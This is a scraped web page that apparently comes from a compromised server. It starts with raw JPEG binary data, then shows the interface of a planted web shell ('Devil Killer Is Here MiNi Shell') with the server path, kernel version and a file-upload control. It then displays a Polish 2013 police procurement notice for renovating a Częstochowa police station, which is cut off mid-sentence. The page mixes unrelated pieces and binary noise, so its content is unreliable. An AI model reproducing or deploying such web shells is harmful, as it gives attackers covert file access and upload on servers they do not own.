JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130726/298232-N-2013.html

<p class="kh_header"><b>Katowice: Remont pomieszczeń w budynku biurowym III Komisariatu Policji w Częstochowie ul. Kiedrzyńska 98</b><br>
<b>Numer ogłoszenia: 298232 - 2013; data zamieszczenia: 26.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji w Katowicach , ul. J. Lompy 19, 40-038 Katowice, woj. śląskie, tel. 032 2002050, faks 032 2002060.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.katowice.kwp.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczeń w budynku biurowym III Komisariatu Policji w Częstochowie ul. Kiedrzyńska 98.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja remontu pomieszczeń w budynku biurowym III Komisariatu Policji w Częstochowie ul. Kiedrzyńska 98 obejmująca: wymianę stolarki budowlanej zewnętrznej, remont sanitariatów, remont pomieszczeń biurowych, wymiana podestu oraz części chodnika przed wejściem głównym do budynku zgodnie z przedmiarem robót stanowiącym załącznik nr 3 do ogłoszenia oraz specyfikacją techniczną wykonania i odbioru robót budowlanych stanowiącą załącznik nr 4 do ogłoszenia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości 7500,00 złotych należy wnieść w terminie składania wniosków o dopuszczenie do udziału w postępowaniu na okres 30 dni jak niżej: Wadium należy wnieść w formach określonych w art. 45 ust. 6 ustawy Prawo Zamówień Publicznych tj. w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowokredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz.U. Nr 109, poz. 1158 z późn. zm. Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Zamawiającego tj.Komenda Wojewódzka Policji w Katowicach Narodowy Bank Polski OO Katowice 91 1010 1212 0050 5013 9120 0000 Zaleca się umieszczenie dopisku - wadium dot. ZP-2380-375-81/2013. Wadium musi być wniesione najpóźniej w terminie składania wniosków o dopuszczenie do udziału w postępowaniu tj. do dnia 05.08.2013r. do godziny 13:00 Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które w oznaczonym terminie tj. najpóźniej w dniu 05.08.2013 r., o godzinie 13:00 znajdzie się na koncie Zamawiającego. Wadium w innej formie niż w ppkt. 2 należy złożyć oryginał w siedzibie Zamawiającego tj. KWP w Katowicach ul. J. Lompy 19, pokój 504 kasa - V piętro blok C lub w Zespole Zamówień Publicznych - VII piętro blok C pokój 735 wraz z ofertą najpóźniej w dniu 05.08.2013 r. do godziny 13:00 Kasa jest czynna w każdy wtorek i czwartek tygodnia oraz w pierwszy i ostatni dzień miesiąca kalendarzowego w godz. od 11:00 - 13:00. Kserokopię gwarancji należy dołączyć do oferty. Brak dokumentu w ofercie nie spowoduje odrzucenia oferty. Wadium ma zabezpieczać interes Zamawiającego na okres od dnia złożenia wniosku o dopuszczenie do udziału w postępowaniu tj. od dnia 05.08.2013r. do dnia zawarcia umowy - z uwagi na relatywny termin przeprowadzania licytacji Zamawiający wyznacza okres ważności wadium na 30 dni i nie może zawierać ograniczeń sprzecznych z ustawą PZP a w szczególności ograniczających możliwość zrealizowania praw określonych w art 46 ust 4a i ust 5 ustawy PZP Kserokopię gwarancji należy dołączyć do wniosku o dopuszczenie do udziału w postępowaniu. Brak dokumentu we wniosku o dopuszczenie do udziału w postępowaniu nie spowoduje odrzucenia wniosku. 4. Wadium zostanie zwrócone w trybie określonym a) w art. 46 ust. 1 z zastrzeżeniem art. 46 ust. 4a ustawy Prawo Zamówień Publicznych wszystkim Wykonawcom niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, b) w art. 46 ust. 1a ustawy Prawo Zamówień Publicznych Wykonawcy, którego oferta została wybrana jako najkorzystniejsza niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego. c) w art.46 ust 2 ustawy Prawo Zamówień Publicznych na pisemny wniosek Wykonawcy, który wycofał wniosek przed upływem terminu składania wniosku o dopuszczenie do udziału w postępowaniu. Zgodnie z art. 46 ust. 5 ustawy Prawo Zamówień Publicznych Zamawiający zatrzymuje wadium, jeżeli Wykonawca, którego oferta została wybrana: odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. Zgodnie z art.46 ust 4 a Prawa Zamówień Publicznych Zamawiający zatrzymuje wadium, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie. Uwaga: W przypadku składania wniosku o dopuszczenie do udziału w postępowaniu przez Wykonawców wspólnie ubiegających się o zamówienie, wadium wnoszone w formie innej niż w pieniądzu musi w pozycji zobowiązanego (Wykonawcy) wskazywać wszystkich Wykonawców ubiegających się wspólnie o zamówienie lub lidera konsorcjum jako działającego w imieniu wszystkich Wykonawców działających w konsorcjum</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki
określone w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych, a w szczególności
Wykonawcy, którzy posiadają niezbędną wiedzę i doświadczenie w wykonywaniu
robót odpowiadających swoim rodzajem i wartością robotom stanowiącym
przedmiot zamówienia: 1. jako roboty odpowiadające swoim rodzajem i wartością
robotom budowlanym stanowiącym przedmiot zamówienia Wykonawca musi
wykazać się wykonaniem: co najmniej jednej roboty ogólnobudowlanej
polegającej na remoncie obiektu na kwotę co najmniej 100.000,00
złotych netto 2. Zamawiający dokona oceny spełnienia warunków udziału w
postępowaniu na podstawie załączonych do wniosku o dopuszczenie do udziału w
postępowaniu dokumentów i oświadczeń w formie spełnia, nie spełnia. Wykonawca
niespełniający warunków udziału w postępowaniu zostanie wykluczony zgodnie z
art. 24 ust. 2 pkt 4 ustawy PZP. 3. Każda robota zostanie uznana jeżeli została
wykonana w okresie ostatnich pięciu lat przed upływem terminu składania wniosków
o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności
jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom
budowlanym stanowiącym przedmiot zamówienia z podaniem ich rodzaju i wartości,
daty i miejsca wykonania wg wzoru załącznika nr 6 do ogłoszenia oraz załączeniem
dowodów potwierdzających, że roboty te zostały wykonane zgodnie z zasadami
sztuki budowlanej i prawidłowo ukończone (np. poświadczenie, lub inne dokumenty
jeżeli z uzasadnionych przyczyno obiektywnym charakterze wykonawca nie jest w
stanie uzyskać poświadczenia). 4. Zgodnie z art. 26 ust. 2b Prawa zamówień
publicznych Wykonawca może polegać na wiedzy i doświadczeniu, potencjale
technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach
finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z
nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić
zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji
zamówienia. W tym celu Wykonawca zobligowany jest załączyć do oferty
następujące dokumenty : 4.1 pisemne zobowiązanie tych podmiotów do oddania mu
do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu
zamówienia 4.2 zakresu i okresu udziału innego podmiotu przy wykonywaniu
zamówienia. W przypadku, kiedy podmiot udostępniający swoje doświadczenie
Wykonawcy będzie brał udział przy wykonaniu zamówienia oprócz zobowiązania
winien przedstawić dokumenty na potwierdzenie braku podstaw do wykluczenia z
udziału w postępowaniu w zakresie art. 24 ust.1 i 2 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych, a w szczególności Wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia: Wykonawca musi złożyć oświadczenie, że osoby które będą uczestniczyły w wykonywaniu zamówienia odpowiedzialne za kierowanie robotami budowlanymi posiadają uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie wymagane przepisami prawa budowlanego dla: a) Kierownika Budowy w specjalności konstrukcyjno-budowlanej, b) kierownika robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,c) kierownika robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie załączonych do wniosku o dopuszczenie do udziału w postępowaniu dokumentów i oświadczeń w formie spełnia, nie spełnia. Wykonawca niespełniający warunków udziału w postępowaniu zostanie wykluczony zgodnie z art. 24 ust. 2 pkt 4 ustawy PZP. Zgodnie z art. 26 ust. 2b Prawa zamówień publicznych Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. W tym celu Wykonawca zobligowany jest załączyć do oferty następujące dokumenty : pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. W przypadku, kiedy podmiot udostępniający swoje doświadczenie Wykonawcy będzie brał udział przy wykonaniu zamówienia oprócz zobowiązania winien przedstawić dokumenty na potwierdzenie braku podstaw do wykluczenia z udziału w postępowaniu w zakresie art. 24 ust.1 i 2 ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem
terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a
jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz oświadczeń i dokumentów, jakie mają dostarczyć wykonawcy w celu
potwierdzenia spełniania wymagań zamawiającego na podstawie art. 25 ust. 1 pkt. 2
ustawy Pzp. Zamawiający dopuszcza podwykonawców. W przypadku gdy Wykonawca
przewiduje powierzenie realizacji części zamówienia podwykonawcy zobowiązany jest
złożyć stosowne oświadczenie na Wniosku o dopuszczenie do udziału w licytacji
elektronicznej stanowiącym załącznik nr 1 do ogłoszenia oraz w formularzu ofertowym
stanowiącym załącznik nr 6 do ogłoszenia. W przypadku wykonawców ubiegających się
wspólnie (konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie
we wniosku, jaki zakres rzeczowy przedmiotu zamówienia będzie realizował każdy z
uczestników konsorcjum. Wykonawca, którego oferta zostanie wybrana jako
najkorzystniejsza, przed zawarciem umowy dostarczy Zamawiającemu wypełniony
formularz ofertowy - załącznik nr 6 do ogłoszenia wraz z szczegółowym kosztorysem
ofertowym stanowiącym potwierdzenie zakresu i wyliczenia ceny oferty wylicytowanej
roboty budowlanej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> https://licytacje.uzp.gov.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> www.slaska.policja.gov.pl</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1. Wymagania formalne: 1.1. Licytacja prowadzona będzie na platformie Urzędu Zamówień Publicznych
znajdującej się na stronie https://licytacje.uzp.gov.pl 1.2. Z platformy w pełnym zakresie mogą
korzystać wyłącznie Wykonawcy zarejestrowani w systemie pod adresem
https://licytacje.uzp.gov.pl 1.3. Wykonawca, aby umożliwić Zamawiającemu dopuszczenie go do
udziału w licytacji, winien wraz z wnioskiem o dopuszczenie go do udziału w licytacji przekazać
informację o swoim loginie. Login winien być przekazany Zamawiającemu w oryginalnej pisowni
tzn. z zachowaniem pisowni dużych i małych liter, numerów, spacji itp. 1.4. W przypadku podania
przez Wykonawcę niewłaściwego loginu bądź nie przekazania go Zamawiającemu wraz z
wnioskiem, Zamawiający dopuszcza przekazanie loginu najpóźniej dwa dni przed terminem
otwarcia licytacji. Brak loginu bądź brak poprawnego loginu będzie skutkowało brakiem
możliwości wzięcia udziału Wykonawcy w licytacji. 2. Wymagania techniczne: Komputer klasy PC
(lub równoważnej) spełniający wymogi techniczne określone przez producentów przeglądarek
internetowych Ms Internet Explorer w wersji 6.0 lub wyższej albo Mozilla Firefox w wersji 2.0 lub
wyższej, z zainstalowaną jedną z ww. przeglądarek lub przeglądarką równoważną, podłączony do
sieci Internet.</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1. Licytacja elektroniczna na: Remont pomieszczeń w budynku biurowym KP III w Częstochowie ul. Kiedrzyńska 98 2. Po zalogowaniu się na platformie, Wykonawcy dopuszczeni do udziału w licytacji
uzyskują dostęp do aplikacji umożliwiającej składanie ofert. Wykonawcy składają swoje oferty
cenowe w postaci elektronicznej. 3. W toku licytacji elektronicznej wykonawcy dopuszczeni do
udziału w licytacji składają kolejne korzystniejsze postąpienia. Możliwość złożenia postąpienia
istnieje od otwarcia licytacji do jej zamknięcia. 4. Oferta złożona w toku licytacji przestaje wiązać
gdy inny Wykonawca złożył ofertę korzystniejszą. 5. W toku licytacji Wykonawcy proponują
rzeczywistą cenę oferty brutto wyrażoną w złotych oraz ewentualnie w groszach; grosze należy
oddzielić od złotych kropką. 6. Cenę oferty brutto stanowi łączny koszt wykonania zamówienia
obejmujący całość robót budowlanych przewidzianych w załączniku nr 3 i nr 4 do ogłoszenia oraz
wszystkie inne koszty z tym związane. Przed przystąpieniem do złożenia postąpienia Wykonawca
winien obliczyć cenę oferty tak, aby możliwe było przygotowanie przez Wykonawcę kosztorysu
ofertowego w oparciu o załącznik nr 3 i 4 do ogłoszenia. 7. Oferta złożona przez Wykonawcę winna
być niższa od oferty najkorzystniejszej co najmniej o kwotę minimalnego postąpienia. 8.
Zamawiający przyjął za minimalne postąpienie wartość 1 000,00 PLN. System nie przyjmie
postąpienia, którego wysokość jest mniejsza od określonego minimalnego postąpienia. 9. W toku
licytacji system na bieżąco udostępnia wszystkim Wykonawcom informacje o pozycji złożonych
przez nich ofert, liczbie Wykonawców biorących udział w licytacji elektronicznej, a także o cenach
złożonych ofert, z tym że do momentu zamknięcia licytacji nie ujawnia się informacji
umożliwiających identyfikację Wykonawców. 10. Zamawiający udzieli zamówienia Wykonawcy, który zaoferuje najniższą cenę brutto. 11. W przypadku podania w trakcie licytacji ceny, której nie da się sporządzić kosztorysu ofertowego
Wykonawca zobowiązany jest prawidłowego przygotowania kosztorysu ofertowego i przeliczenia
ceny, przy czym wartość ceny ofertowej wpisanej w formularzu ofertowym wyliczonej na
podstawie kosztorysu ofertowego nie może przekroczyć ceny wylicytowanej w trakcie licytacji
elektronicznej.</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 10 minut od ostatniego postąpienia</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 05.08.2013 godzina 13:00, miejsce: Komenda Wojewódzka Policji w Katowicach 40-038 Katowice
ul. Lompy 19. Zespół Zamówień Publicznych KWP blok C piętro VII pokój 735..</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> 5 dni od dnia przekazania Wykonawcom zaproszenia do składania ofert, godz. 10:00.</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>Licytacja zostanie zamknięta jeżeli w ciągu 10 minut od złożenia najkorzystniejszego postąpienia, żaden z Wykonawców nie złoży korzystniejszego postąpienia</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Zgodnie z projektem umowy - załącznik nr 2 do ogłoszenia wybrany Wykonawca zobowiązany
będzie wnieść zabezpieczenie należytego wykonania umowy w wysokości 10 % ceny całkowitej
podanej w formularzu ofertowym po przeprowadzonej licytacji elektronicznej. Najpóźniej w dniu
zawarcia umowy Wykonawca musi wnieść 100 % wartości zabezpieczenia. Zabezpieczenie
Wykonawca wnosi w sposób określony w § 5 projektu umowy. Zabezpieczenie należy wnieść w
formach określonych art. 148 ust. 1 ustawy Prawo Zamówień Publicznych w pieniądzu,
